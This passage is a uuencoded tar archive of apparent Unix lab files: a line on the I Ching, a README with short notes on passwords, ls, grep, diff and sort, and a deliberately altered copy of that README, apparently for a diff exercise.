M````````````````````````````````````````````````````````````
M``````````````````````!L86(O24-H:6YG````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````,#$P,#8T-``P,#(Q-C4S`#`P
M,#<P,#<`,#`P,#`P,#`R,#$`,#4T,#(R,30U-C,`,#`Q,C8T,0`P````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````'5S=&%R`#`P979A9`````````````````````````````````````!C
M8S,U.3$``````````````````````````````````#`P,#`S-3,`,#`P,#8Q
M-P``````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````````%1H92!)($-H:6YG
M(&]R($)O;VL@;V8@0VAA;F=E<R!I<R!A;B!A;F-I96YT($-H:6YE<V4@;W)A
M8VQE('1H870@:&%S"F)E96X@:6X@=7-E(&9O<B!C96YT=7)I97,@87,@82!S
M;W5R8V4@;V8@=VES9&]M(&%N9"!A9'9I8V4N"@``````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````;&%B+U)%041-10``````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````#`Q,#`V-#0`,#`R,38U,P`P,#`W,#`W`#`P,#`P
M,#$T,#,Q`#`U-#`R,34V,S$Q`#`P,3(T,S<`,```````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````````!U<W1A<@`P
M,&5V860`````````````````````````````````````8V,S-3DQ````````
M```````````````````````````P,#`P,S4S`#`P,#`V,3<`````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````!/;B!214%$344@+BXN"BTM+2TM+2TM
M+2TM+2T*1FEL97,@8V%L;&5D(&!214%$344G(&%R92!O9G1E;B!F;W5N9"!O
M;B!U;FEX('-Y<W1E;7,@=&\@871T<F%C="!T:&4*871T96YT:6]N(&]F('!E
M;W!L92!A8V-E<W-I;F<@=&AE(&1I<F5C=&]R>2X@(%1H97D@8V]N=&%I;B!I
M;7!O<G1A;G0*:6YF;W)M871I;VX@86)O=70@=&AE('-O9G1W87)E('-T;W)E
M9"!I;B!T:&4@9&ER96-T;W)Y+"!F;W(@97AA;7!L92P*=F5R<VEO;B!I;F9O
M<FUA=&EO;BP@;W!E<F%T:6YG(&UO9&5S+"!A;F0@:6YS=&%L;&%T:6]N(&YO
M=&5S+@H*2&]W979E<BP@8%)%041-12<@:7,@<F%T:&5R(&QI:V4@86YY(&EN
M<W1R=6-T:6]N(&UA;G5A;"!I;B!T:&%T('!E;W!L90IO;FQY('1E;F0@=&\@
M8V]N<W5L="!I="!W:&5N('-O;65T:&EN9R!G;V5S('=R;VYG+B`@069T97(@
M=&AE(&5V96YT(0H*"D]N('!A<W-W;W)D<R`N+BX*+2TM+2TM+2TM+2TM+2TM
M+0I.97<@<&%S<W=O<F1S('-H;W5L9"!B92!A="!L96%S="!F:79E(&-H87)A
M8W1E<G,@;&]N9R!I9B!T:&5Y"F-O;6)I;F4@=7!P97(M8V%S92!A;F0@;&]W
M97(M8V%S92!L971T97)S+"!O<B!A="!L96%S="!S:7@@8VAA<F%C=&5R<PIL
M;VYG(&EF(&EN(&UO;F]C87-E+B`@57-E<G,@=&AA="!P97)S:7-T(&EN(&5N
M=&5R:6YG('-H;W)T97(*<&%S<W=O<F1S(&%R92!C;VUP<F]M:7-I;F<@=&AE
M:7(@;W=N('-E8W5R:71Y+B!4:&4@;G5M8F5R(&]F"G-I9VYI9FEC86YT(&-H
M87)A8W1E<G,@:6X@82!P87-S=V]R9"!I<R!E:6=H="P@86QT:&]U9V@@;&]N
M9V5R"G!A<W-W;W)D<R!W:6QL(&)E(&%C8V5P=&5D+@H*3VYL>2!T:&4@;W=N
M97(@;V8@=&AE(&YA;64@;W(@=&AE('-U<&5R+75S97(@;6%Y(&-H86YG92!A
M('!A<W-W;W)D.PIT:&4@;W=N97(@;75S="!P<F]V92!H92!K;F]W<R!T:&4@
M;VQD('!A<W-W;W)D+B`@5&AE('-U<&5R+75S97(@8V%N"F-H86YG92!A;GD@
M<&%S<W=O<F0@86YD(&ES(&YO="!F;W)C92!T;R!C;VUP;'D@=VET:"!P87-S
M=V]R9"!A9VEN9PIR97%U:7)E;65N=',N"@H*3VX@;',@+BXN"BTM+2TM+2TM
M+0I&;W(@96%C:"!F:6QE;F%M92!W:&EC:"!I<R!A(&1I<F5C=&]R>2P@;',@
M;&ES=',@=&AE(&-O;G1E;G1S(&]F('1H90ID:7)E8W1O<GD[(&9O<B!E86-H
M(&9I;&5N86UE('=H:6-H(&ES(&$@9FEL92P@;',@<F5P96%T<R!I=',@;F%M
M92!A;F0*86YY(&]T:&5R(&EN9F]R;6%T:6]N(')E<75E<W1E9"X@($)Y(&1E
M9F%U;'0L('1H92!O=71P=70@:7,@<V]R=&5D"F%L<&AA8F5T:6-A;&QY+B`@
M5VAE;B!N;R!A<F=U;65N="!I<R!G:79E;BP@=&AE(&-U<G)E;G0@9&ER96-T
M;W)Y(&ES"FQI<W1E9"X@("!7:&5N('-E=F5R86P@87)G=6UE;G1S(&%R92!G
M:79E;BP@=&AE(&%R9W5M96YT<R!A<F4@9FER<W0*<V]R=&5D(&%P<')O<')I
M871E;'DL(&)U="!F:6QE(&%R9W5M96YT<R!A<F4@<')O8V5S<V5D(&)E9F]R
M90ID:7)E8W1O<FEE<R!A;F0@=&AE:7(@8V]N=&5N=',N"@I);B!O<F1E<B!T
M;R!D971E<FUI;F4@;W5T<'5T(&9O<FUA=',@9F]R('1H92`M0RP@+7@L(&%N
M9"`M;2!O<'1I;VYS+`HO=7-R+S5B:6XO;',@=7-E<R!A;B!E;G9I<F]N;65N
M="!V87)I86)L92P@0T],54U.4RP@=&\@9&5T97)M:6YE('1H90IN=6UB97(@
M;V8@8VAA<F%C=&5R('!O<VET:6]N<R!A=F%I;&%B;&4@;VX@;VYE(&]U='!U
M="!L:6YE+B`@268@=&AI<PIV87)I86)L92!I<R!N;W0@<V5T+"!T:&4@=&5R
M;6EN9F\@9&%T86)A<V4@:7,@=7-E9"!T;R!D971E<FUI;F4@=&AE"FYU;6)E
M<B!O9B!C;VQU;6YS+"!B87-E9"!O;B!T:&4@96YV:7)O;FUE;G0@=F%R:6%B
M;&4@5$5232X@($EF('1H:7,*:6YF;W)M871I;VX@8V%N;F]T(&)E(&]B=&%I
M;F5D+"`X,"!C;VQU;6YS(&%R92!A<W-U;65D+B`@2&5R92!I<R!A"FQI;F4@
M=VAI8V@@8V]N=&%I;G,@4D5!1$U%(0H*"D]N(&=R97`@+BXN"BTM+2TM+2TM
M+2TM"D-O;6UA;F1S(&]F('1H92!G<F5P(&9A;6EL>2!S96%R8V@@=&AE(&EN
M<'5T(&9I;&5N86UE<R`H=&AE('-T86YD87)D"FEN<'5T(&1E9F%U;'0I(&9O
M<B!L:6YE<R!M871C:&EN9R!A('!A='1E<FXN("!.;W)M86QL>2P@96%C:"!L
M:6YE(&9O=6YD"FES(&-O<&EE9"!T;R!T:&4@<W1A;F1A<F0@;W5T<'5T+B`@
M9W)E<"!P871T97)N<R!A<F4@;&EM:71E9"!R96=U;&%R"F5X<')E<W-I;VYS
M(&EN('1H92!S='EL92!O9B!E9"@Q*2X@(&5G<F5P('!A='1E<FYS(&%R92!F
M=6QL(')E9W5L87(*97AP<F5S<VEO;G,@:6YC;'5D:6YG(&%L=&5R;F%T:6]N
M+B`@9F=R97`@<&%T=&5R;G,@87)E(&9I>&5D('-T<FEN9W,@+0IN;R!R96=U
M;&%R(&5X<')E<W-I;VX@;65T86-H87)A8W1E<G,@87)E('-U<'!O<G1E9"X*
M"E=H96X@86YY(&]F('1H92!G<F5P('5T:6QI=&EE<R!I<R!A<'!L:65D('1O
M(&UO<F4@=&AA;B!O;F4@:6YP=70@9FEL92P*=&AE(&YA;64@;V8@=&AE(&9I
M;&4@:7,@9&ES<&QA>65D('!R96-E9&EN9R!E86-H(&QI;F4@=VAI8V@@;6%T
M8VAE<R!T:&4*<&%T=&5R;BX@(%1H92!F:6QE;F%M92!I<R!N;W0@9&ES<&QA
M>65D('=H96X@<')O8V5S<VEN9R!A('-I;F=L92!F:6QE+`IS;R!I9B!Y;W4@
M86-T=6%L;'D@=V%N="!T:&4@9FEL96YA;64@=&\@87!P96%R+"!U<V4@+V1E
M=B]N=6QL(&%S(&$*<V5C;VYD(&9I;&4@:6X@=&AE(&QI<W0N"@H*"D]N(&1I
M9F8@+BXN"BTM+2TM+2TM+2TM"F1I9F8@:7,@82!D:69F97)E;G1I86P@9FEL
M92!C;VUP87)A=&]R+B`@5VAE;B!R=6X@;VX@<F5G=6QA<B!F:6QE<RP@86YD
M"G=H96X@8V]M<&%R:6YG('1E>'0@9FEL97,@=&AA="!D:69F97(@9'5R:6YG
M(&1I<F5C=&]R>2!C;VUP87)I<V]N("AS964*=&AE(&YO=&5S(&)E;&]W(&]N
M(&-O;7!A<FEN9R!D:7)E8W1O<FEE<RDL(&1I9F8@=&5L;',@=VAA="!L:6YE
M<R!M=7-T"F)E(&-H86YG960@:6X@=&AE(&9I;&5S('1O(&)R:6YG('1H96T@
M:6YT;R!A9W)E96UE;G0N("`@17AC97!T(&EN(')A<F4*8VER8W5M<W1A;F-E
M<RP@9&EF9B!F:6YD<R!A('-M86QL97-T('-U9F9I8VEE;G0@<V5T(&]F(&1I
M9F9E<BT@96YC97,N"DEF(&YE:71H97(@9FEL96YA;64Q(&YO<B!F:6QE;F%M
M93(@:7,@82!D:7)E8W1O<GDL(&5I=&AE<B!M87D@8F4@9VEV96X*87,@8"TG
M+"!I;B!W:&EC:"!C87-E('1H92!S=&%N9&%R9"!I;G!U="!I<R!U<V5D+B`@
M268@9FEL96YA;64Q(&ES(&$*9&ER96-T;W)Y+"!A(&9I;&4@:6X@=&AA="!D
M:7)E8W1O<GD@=VAO<V4@9FEL96YA;64@:7,@=&AE('-A;64@87,@=&AE"F9I
M;&5N86UE(&]F(&9I;&5N86UE,B!I<R!U<V5D("AA;F0@=FEC92!V97)S82DN
M"@I4:&5S92!L:6YE<R!R97-E;6)L92!E9"@Q*2!C;VUM86YD<R!T;R!C;VYV
M97)T(&9I;&5N86UE,2!I;G1O"F9I;&5N86UE,BX@("!4:&4@;G5M8F5R<R!A
M9G1E<B!T:&4@;&5T=&5R<R!P97)T86EN('1O(&9I;&5N86UE,BX@($EN"F9A
M8W0L(&)Y(&5X8VAA;F=I;F<@82!F;W(@9"!A;F0@<F5A9&EN9R!B86-K=V%R
M9"!O;F4@;6%Y(&%S8V5R=&%I;@IE<75A;&QY(&AO=R!T;R!C;VYV97)T(&9I
M;&5N86UE,B!I;G1O(&9I;&5N86UE,2X@($%S(&EN(&5D*#$I+`II9&5N=&EC
M86P@<&%I<G,L('=H97)E(&XQ(#T@;C(@;W(@;C,@/2!N-"P@87)E(&%B8G)E
M=FEA=&5D(&%S(&$@<VEN9VQE"FYU;6)E<BX*"D9O;&QO=VEN9R!E86-H(&]F
M('1H97-E(&QI;F5S(&-O;64@86QL('1H92!L:6YE<R!T:&%T(&%R92!A9F9E
M8W1E9"!I;@IT:&4@9FER<W0@9FEL92!F;&%G9V5D(&)Y(&`\)RP@=&AE;B!A
M;&P@=&AE(&QI;F5S('1H870@87)E(&%F9F5C=&5D(&EN"G1H92!S96-O;F0@
M9FEL92!F;&%G9V5D(&)Y(&`^)RX*"DEF(&)O=&@@87)G=6UE;G1S(&%R92!D
M:7)E8W1O<FEE<RP@9&EF9B!S;W)T<R!T:&4@8V]N=&5N=',@;V8@=&AE"F1I
M<F5C=&]R:65S(&)Y(&YA;64L(&%N9"!T:&5N(')U;G,@=&AE(')E9W5L87(@
M9FEL92!D:69F('!R;V=R86T@87,*9&5S8W)I8F5D(&%B;W9E(&]N('1E>'0@
M9FEL97,@=VAI8V@@87)E(&1I9F9E<F5N="X@("!":6YA<GD@9FEL97,@=VAI
M8V@*9&EF9F5R+"!C;VUM;VX@<W5B9&ER96-T;W)I97,L(&%N9"!F:6QE<R!W
M:&EC:"!A<'!E87(@:6X@;VYL>2!O;F4*9&ER96-T;W)Y(&%R92!L:7-T960N
M"@H*3VX@<V]R="`N+BX*+2TM+2TM+2TM+2T*5&AE('-O<G0@<')O9W)A;2!S
M;W)T<R!A;F0@8V]L;&%T97,@;&EN97,@8V]N=&%I;F5D(&EN('1H92!N86UE
M9"!F:6QE<RP*86YD('=R:71E<R!T:&4@<F5S=6QT(&]N=&\@=&AE('-T86YD
M87)D(&]U='!U="X@($EF(&YO(&9I;&5N86UE"F%R9W5M96YT(&ES(&=I=F5N
M+"!O<B!I9B!@+2<@87!P96%R<R!A<R!A;B!A<F=U;65N="P@<V]R="!A8V-E
M<'1S(&EN<'5T"F9R;VT@=&AE('-T86YD87)D(&EN<'5T+@H*3W5T<'5T(&QI
M;F5S(&%R92!N;W)M86QL>2!S;W)T960@;VX@82!C:&%R86-T97(M8GDM8VAA
M<F%C=&5R(&)A<VES+`IF<F]M(&QE9G0@=&\@<FEG:'0@=VET:&EN(&$@;&EN
M92X@(%1H92!D969A=6QT(&-O;&QA=&EN9R!S97%U96YC92!I<PIT:&4@05-#
M24D@8VAA<F%C=&5R('-E="X@($QI;F5S(&-A;B!A;'-O(&)E('-O<G1E9"!A
M8V-O<F1I;F<@=&\@=&AE"F-O;G1E;G1S(&]F(&]N92!O<B!M;W)E(&9I96QD
M<R!S<&5C:69I960@8GD@82!S;W)T+69I96QD+`IS<&5C:69I8V%T:6]N+"!U
M<VEN9R!T:&4@*W-W("AS=&%R=&EN9RUW;W)D*2P@+65W("AE;F0M870M=V]R
M9"DL(&%N9`IT:&4@+71C("AS970M5$%"+6-H87)A8W1E<B]W;W)D(&1E;&EM
M:71E<BD@;W!T:6]N<RP@87,@(&1E<V-R:6)E9`IU;F1E<B!/4%1)3TY3(&)E
M;&]W+B`@5VAE;B!N;R!W;W)D(&1E;&EM:71E<B!I<R!S<&5C:69I960L(&]N
M92!O<B!M;W)E"F%D:F%C96YT('=H:71E+7-P86-E(&-H87)A8W1E<G,@*%-0
M04-%(&%N9"!404(I('-I9VYI9GD@=&AE(&5N9"!O9B!T:&4*<')E=FEO=7,@
M=V]R9#L@=&AE(&QI;F5S.@H*66]U(&-A;B!A<'!L>2!A(&-H87)A8W1E<B!O
M9F9S970@=&\@<W<@86YD(&5W('1O(&EN9&EC871E('1H870@82!F:65L9`II
M<R!T;R!S=&%R="!O<B!E;F0@82!G:79E;B!N=6UB97(@;V8@8VAA<F%C=&5R
M<R!W:71H:6X@82!W;W)D+"!U<VEN9PIT:&4@;F]T871I;VXZ(&!W+F,G+B`@
M02!S=&%R=&EN9R!P;W-I=&EO;B!S<&5C:69I960@:6X@=&AE(&9O<FTZ(&`K
M=RYC)PII;F1I8V%T97,@=&AE(&-H87)A8W1E<B!I;B!P;W-I=&EO;B!C("AB
M96=I;FYI;F<@=VET:"`P(&9O<B!T:&4@9FER<W0*8VAA<F%C=&5R*2P@=VET
M:&EN('=O<F0@=R`H,2!A;F0@,2XP(&%R92!E<75I=F%L96YT*2X@($%N(&5N
M9&EN9PIP;W-I=&EO;B!S<&5C:69I960@:6X@=&AE(&9O<FTZ("!@+7<N8R<@
M:6YD:6-A=&5S('1H870@=&AE(&9I96QD(&5N9',*870@=&AE(&-H87)A8W1E
M<B!J=7-T('!R:6]R('1O('!O<VET:6]N(&,@*&)E9VEN;FEN9R!W:71H(#`@
M9F]R('1H90ID96QI;6ET97(@:G5S="!P<FEO<B!T;R!T:&4@9FER<W0@8VAA
M<F%C=&5R*2P@=VET:&EN('=O<F0@=RX@($EF('1H92`M8@IF;&%G(&ES(&EN
M(&5F9F5C="P@8R!I<R!C;W5N=&5D(&9R;VT@=&AE(&9I<G-T(&YO;BUW:&ET
M92US<&%C92!O<@IN;VXM9&5L:6UI=&5R(&-H87)A8W1E<B!I;B!T:&4@9FEE
M;&0L(&]T:&5R=VES92P@9&5L:6UI=&5R(&-H87)A8W1E<G,*87)E(&-O=6YT
M960N"@I4:&4@86UO=6YT(&]F(&UA:6X@;65M;W)Y('5S960@8GD@=&AE('-O
M<G0@:&%S(&$@;&%R9V4@:6UP86-T(&]N(&ET<PIP97)F;W)M86YC92X@(%-O
M<G1I;F<@82!S;6%L;"!F:6QE(&EN(&$@;&%R9V4@86UO=6YT(&]F(&UE;6]R
M>2!I<R!A"G=A<W1E+B`@268@=&AI<R!O<'1I;VX@:7,@;VUI='1E9"P@<V]R
M="!B96=I;G,@=7-I;F<@82!S>7-T96T@9&5F875L=`IM96UO<GD@<VEZ92P@
M86YD(&-O;G1I;G5E<R!T;R!A9&0@<W!A8V4@87,@;F5E9&5D+B`@($EF('1H
M:7,@;W!T:6]N(&ES"F=I=F5N('-O<G0@<W1A<G1S('=I=&@@:VUE;2P@:VEL
M;V)Y=&5S(&]F(&UE;6]R>2P@:68@86QL;W=E9"P@;W(@87,*8VQO<V4@=&\@
M=&AA="!A;6]U;G0@87,@<&]S<VEB;&4N("`@4W5P<&QY:6YG("UY,"!G=6%R
M86YT965S('1H870@<V]R=`IS=&%R=',@=VET:"!A(&UI;FEM=6T@;V8@;65M
M;W)Y+B`@0GD@8V]N=F5N=&EO;BP@+7D@*'=I=&@@;F\@87)G=6UE;G0I"G-T
M87)T<R!W:71H(&UA>&EM=6T@;65M;W)Y+@H*````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````&QA8B]214%$344R````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````````P,3`P-C0T`#`P,C$V-3,`
M,#`P-S`P-P`P,#`P,#`Q-#$T,0`P-C$R,38S,34W-``P,#$R-3,S`#``````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````=7-T87(`,#!E=F%D````````````````````````````````````
M`&-C,S4Y,0``````````````````````````````````,#`P,#,U,P`P,#`P
M-C$W````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````"D]N(%)%041-
M12`N+BX*+2TM+2TM+2TM+2TM+0I&:6QE<R!C86QL960@8%)%041-12<@87)E
M(&]F=&5N(&9O=6YD(&]N('5N:7@@<WES=&5M<R!T;R!A='1R86-T('1H90IA
M='1E;G1I;VX@;V8@<&5O<&QE(&%C8V5S<VEN9R!T:&4@9&ER96-T;W)Y+B`@
M5&AE>2!C;VYT86EN(&EM<&]R=&%N=`II;F9O<FUA=&EO;B!A8F]U="!T:&4@
M<V]F='=A<F4@<W1O<F5D(&EN('1H92!D:7)E8W1O<GDL(&9O<B!E>&%M<&QE
M+`IV97)S:6]N(&EN9F]R;6%T:6]N+"!O<&5R871I;F<@;6]D97,L(&%N9"!I
M;G-T86QL871I;VX@;F]T97,N"@I(;W=E=F5R+"!@4D5!1$U%)R!I<R!R871H
M97(@;&EK92!A;GD@:6YS=')U8W1I;VX@;6%N=6%L(&EN('1H870@<&5O<&QE
M"F]N;'D@=&5N9"!T;R!C;VYS=6QT(&ET('=H96X@<V]M971H:6YG(&=O97,@
M=W)O;F<N("!!9G1E<B!T:&4@979E;G0A"@I/;B!P87-S=V]R9',@+BXN"BTM
M+2TM+2TM+2TM+2TM+2T*3F5W('!A<W-W;W)D<R!S:&]U;&0@8F4@870@;&5A
M<W0@9FEV92!C:&%R86-T97)S(&QO;F<@:68@=&AE>0IC;VUB:6YE('5P<&5R
M+6-A<V4@86YD(&QO=V5R+6-A<V4@;&5T=&5R<RP@;W(@870@;&5A<W0@<VEX
M(&-H87)A8W1E<G,*<&%S<W=O<F1S(&%R92!C;VUP<F]M:7-I;F<@=&AE:7(@
M;W=N('-E8W5R:71Y+B!4:&4@;G5M8F5R(&]F"F-H87)A8W1E<G,@:6X@82!P
M87-S=V]R9"!I<R!E:6=H="P@86QT:&]U9V@@;&]N9V5R"G=I;&P@8F4@86-C
M97!T960N"@IL;VYG(&EF(&EN(&UO;F]C87-E+B`@57-E<G,@=&AA="!P97)S
M:7-T(&EN(&5N=&5R:6YG('-H;W)T97(*<F5Q=6ER96UE;G1S+@H*<F5Q=6ER
M96UE;G1S+@IR97%U:7)E;65N=',N"@IL;VYG(&EF(&EN(&UO;F]C87-E+B`@
M57-E<G,@=&AA="!P97)S:7-T(&EN(&5N=&5R:6YG('-H;W)T97(*3VYL>2!T
M:&4@;W=N97(@86YD(&YO="!A;GEO;F4@96QS92!O9B!T:&4@<V%M92!N86UE
M(&UA>2!C:&%N9V4@82!P87-S=V]R9#L*=&AE(&]W;F5R(&UU<W0@<')O=F4@
M:&4@:VYO=W,@=&AE(&]L9"!P87-S=V]R9"X@(%1H92!S=7!E<BUU<V5R(&-A
M;@IC:&%N9V4@86YY('!A<W-W;W)D(&%N9"!I<R!N;W0@9F]R8V4@=&\@8V]M
M<&QY('=I=&@@<&%S<W=O<F0@86=I;F<*3VX@;',@+BXN"BTM+2TM+2TM+0I&
M;W(@96%C:"!F:6QE;F%M92!W:&EC:"!I<R!A(&1I<F5C=&]R>2P@;',@;&ES
M=',@=&AE(&-O;G1E;G1S(&]F('1H90ID:7)E8W1O<GD[(&9O<B!E86-H(&9I
M;&5N86UE('=H:6-H(&ES(&$@9FEL92P@;',@<F5P96%T<R!I=',@;F%M92!A
M;F0*86YY(&]T:&5R(&EN9F]R;6%T:6]N(')E<75E<W1E9"X@($)Y(&1E8W)E
M92P@=&AE(&]U='!U="!I<R!S;W)T960*86QP:&%B971I8V%L;'DN("!7:&5N
M(&YO(&%R9W5M96YT(&ES(&=I=F5N+"!T:&4@8W5R<F5N="!D:7)E8W1O<GD@
M:7,*;&ES=&5D+B`@(%=H96X@<V5V97)A;"!A<F=U;65N=',@87)E(&=I=F5N
M+"!T:&4@87)G=6UE;G1S(&%R92!F:7)S=`IS;W)T960@87!P<F]P<FEA=&5L
M>2P@8G5T(&9I;&4@87)G=6UE;G1S(&%R92!P<F]C97-S960@8F5F;W)E"F1I
M<F5C=&]R:65S(&%N9"!T:&5I<B!C;VYT96YT<RX*"DEN(&]R9&5R('1O(&1E
M=&5R;6EN92!O=71P=70@9F]R;6%T<R!F;W(@=&AE("U#+"`M>"P@86YD("UM
M(&]P=&EO;G,L"B]U<W(O-6)I;B]L<R!U<V5S(&%N(&5N=FER;VYM96YT('9A
M<FEA8FQE+"!#3TQ534Y3+"!T;R!D971E<FUI;F4@=&AE"FYU;6)E<B!O9B!C
M:&%R86-T97(@<&]S:71I;VYS(&%V86EL86)L92!O;B!O;F4@;W5T<'5T(&QI
M;F4N("!)9B!T:&ES"G9A<FEA8FQE(&ES(&YO="!S970L('1H92!T97)M:6YF
M;R!D871A8F%S92!I<R!U<V5D('1O(&1E=&5R;6EN92!T:&4*;G5M8F5R(&]F
M(&-O;'5M;G,L(&)A<V5D(&]N('1H92!E;G9I<F]N;65N="!V87)I86)L92!4
M15)-+B`@268@=&AI<PII;F9O<FUA=&EO;B!C86YN;W0@8F4@;V)T86EN960L
M(#@P(&-O;'5M;G,@87)E(&%S<W5M960N("!(97)E(&ES(&$*;&EN92!W:&EC
M:"!C;VYT86EN<R!214%$344A"@H*3VX@9W)E<"`N+BX*+2TM+2TM+2TM+2T*
M0V]M;6%N9',@;V8@=&AE(&=R97`@9F%M:6QY('-E87)C:"!T:&4@:6YP=70@
M9FEL96YA;65S("AT:&4@<W1A;F1A<F0*:6YP=70@9&5F875L="D@9F]R(&QI
M;F5S(&UA=&-H:6YG(&$@<&%T=&5R;BX@($YO<FUA;&QY+"!E86-H(&QI;F4@
M9F]U;F0*:7,@8V]P:65D('1O('1H92!S=&%N9&%R9"!O=71P=70N("!G<F5P
M('!A='1E<FYS(&%R92!L:6UI=&5D(')E9W5L87(*97AP<F5S<VEO;G,@:6X@
M=&AE('-T>6QE(&]F(&5D*#$I+B`@96=R97`@<&%T=&5R;G,@87)E(&9U;&P@
M<F5G=6QA<@IE>'!R97-S:6]N<R!I;F-L=61I;F<@86QT97)N871I;VXN("!F
M9W)E<"!P871T97)N<R!A<F4@9FEX960@<W1R:6YG<R`M"FYO(')E9W5L87(@
M97AP<F5S<VEO;B!M971A8VAA<F%C=&5R<R!A<F4@<W5P<&]R=&5D+@H*5VAE
M;B!A;GD@;V8@=&AE(&=R97`@=71I;&ET:65S(&ES(&%P<&QI960@=&\@;6]R
M92!T:&%N(&]N92!I;G!U="!F:6QE+`IT:&4@;F%M92!O9B!T:&4@9FEL92!I
M<R!D:7-P;&%Y960@<')E8V5D:6YG(&5A8V@@;&EN92!W:&EC:"!M871C:&5S
M('1H90IP871T97)N+B`@5&AE(&9I;&5N86UE(&ES(&YO="!D:7-P;&%Y960@
M=VAE;B!P<F]C97-S:6YG(&$@<VEN9VQE(&9I;&4L"G-O(&EF('EO=2!A8W1U
M86QL>2!W86YT('1H92!F:6QE;F%M92!T;R!A<'!E87(L('5S92`O9&5V+VYU
M;&P@87,@80IS96-O;F0@9FEL92!I;B!T:&4@;&ES="X*"@H*3VX@9&EF9B`N
M+BX*+2TM+2TM+2TM+2T*9&EF9B!I<R!A(&1I9F9E<F5N=&EA;"!F:6QE(&-O
M;7!A<F%T;W(N("!7:&5N(')U;B!O;B!R96=U;&%R(&9I;&5S+"!A;F0*=VAE
M;B!C;VUP87)I;F<@=&5X="!F:6QE<R!T:&%T(&1I9F9E<B!D=7)I;F<@9&ER
M96-T;W)Y(&-O;7!A<FES;VX@*'-E90IT:&4@;F]T97,@8F5L;W<@;VX@8V]M
M<&%R:6YG(&1I<F5C=&]R:65S*2P@9&EF9B!T96QL<R!W:&%T(&QI;F5S(&UU
M<W0*8F4@8VAA;F=E9"!I;B!T:&4@9FEL97,@=&\@8G)I;F<@=&AE;2!I;G1O
M(&%G<F5E;65N="X@("!%>&-E<'0@:6X@<F%R90IC:7)C=6US=&%N8V5S+"!D
M:69F(&9I;F1S(&$@<VUA;&QE<W0@<W5F9FEC:65N="!S970@;V8@9&EF9F5R
M+2!E;F-E<RX*268@;F5I=&AE<B!F:6QE;F%M93$@;F]R(&9I;&5N86UE,B!I
M<R!A(&1I<F5C=&]R>2P@96ET:&5R(&UA>2!B92!G:79E;@IA<R!@+2<L(&EN
M('=H:6-H(&-A<V4@=&AE('-T86YD87)D(&EN<'5T(&ES('5S960N("!)9B!F
M:6QE;F%M93$@:7,@80ID:7)E8W1O<GDL(&$@9FEL92!I;B!T:&%T(&1I<F5C
M=&]R>2!W:&]S92!F:6QE;F%M92!I<R!T:&4@<V%M92!A<R!T:&4*9FEL96YA
M;64@;V8@9FEL96YA;64R(&ES('5S960@*&%N9"!V:6-E('9E<G-A*2X*"E1H
M97-E(&QI;F5S(')E<V5M8FQE(&5D*#$I(&-O;6UA;F1S('1O(&-O;G9E<G0@
M9FEL96YA;64Q(&EN=&\*9FEL96YA;64R+B`@(%1H92!N=6UB97)S(&%F=&5R
M('1H92!L971T97)S('!E<G1A:6X@=&\@9FEL96YA;64R+B`@26X*9F%C="P@
M8GD@97AC:&%N9VEN9R!A(&9O<B!D(&%N9"!R96%D:6YG(&)A8VMW87)D(&]N
M92!M87D@87-C97)T86EN"F5Q=6%L;'D@:&]W('1O(&-O;G9E<G0@9FEL96YA
M;64R(&EN=&\@9FEL96YA;64Q+B`@07,@:6X@960H,2DL"FED96YT:6-A;"!P
M86ER<RP@=VAE<F4@;C$@/2!N,B!O<B!N,R`](&XT+"!A<F4@86)B<F5V:6%T
M960@87,@82!S:6YG;&4*;G5M8F5R+@H*1F]L;&]W:6YG(&5A8V@@;V8@=&AE
M<V4@;&EN97,@8V]M92!A;&P@=&AE(&QI;F5S('1H870@87)E(&%F9F5C=&5D
M(&EN"G1H92!F:7)S="!F:6QE(&9L86=G960@8GD@8#PG+"!T:&5N(&%L;"!T
M:&4@;&EN97,@=&AA="!A<F4@869F96-T960@:6X*=&AE('-E8V]N9"!F:6QE
M(&9L86=G960@8GD@8#XG+@H*268@8F]T:"!A<F=U;65N=',@87)E(&1I<F5C
M=&]R:65S+"!D:69F('-O<G1S('1H92!C;VYT96YT<R!O9B!T:&4*9&ER96-T
M;W)I97,@8GD@;F%M92P@86YD('1H96X@<G5N<R!T:&4@<F5G=6QA<B!F:6QE
M(&1I9F8@<')O9W)A;2!A<PID97-C<FEB960@86)O=F4@;VX@=&5X="!F:6QE
M<R!W:&EC:"!A<F4@9&EF9F5R96YT+B`@($)I;F%R>2!F:6QE<R!W:&EC:`ID
M:69F97(L(&-O;6UO;B!S=6)D:7)E8W1O<FEE<RP@86YD(&9I;&5S('=H:6-H
M(&%P<&5A<B!I;B!O;FQY(&]N90ID:7)E8W1O<GD@87)E(&QI<W1E9"X*"@I/
M;B!S;W)T("XN+@HM+2TM+2TM+2TM+0I4:&4@<V]R="!P<F]G<F%M('-O<G1S
M(&%N9"!C;VQL871E<R!L:6YE<R!C;VYT86EN960@:6X@=&AE(&YA;65D(&9I
M;&5S+`IA;F0@=W)I=&5S('1H92!R97-U;'0@;VYT;R!T:&4@<W1A;F1A<F0@
M;W5T<'5T+B`@268@;F\@9FEL96YA;64*87)G=6UE;G0@:7,@9VEV96XL(&]R
M(&EF(&`M)R!A<'!E87)S(&%S(&%N(&%R9W5M96YT+"!S;W)T(&%C8V5P=',@
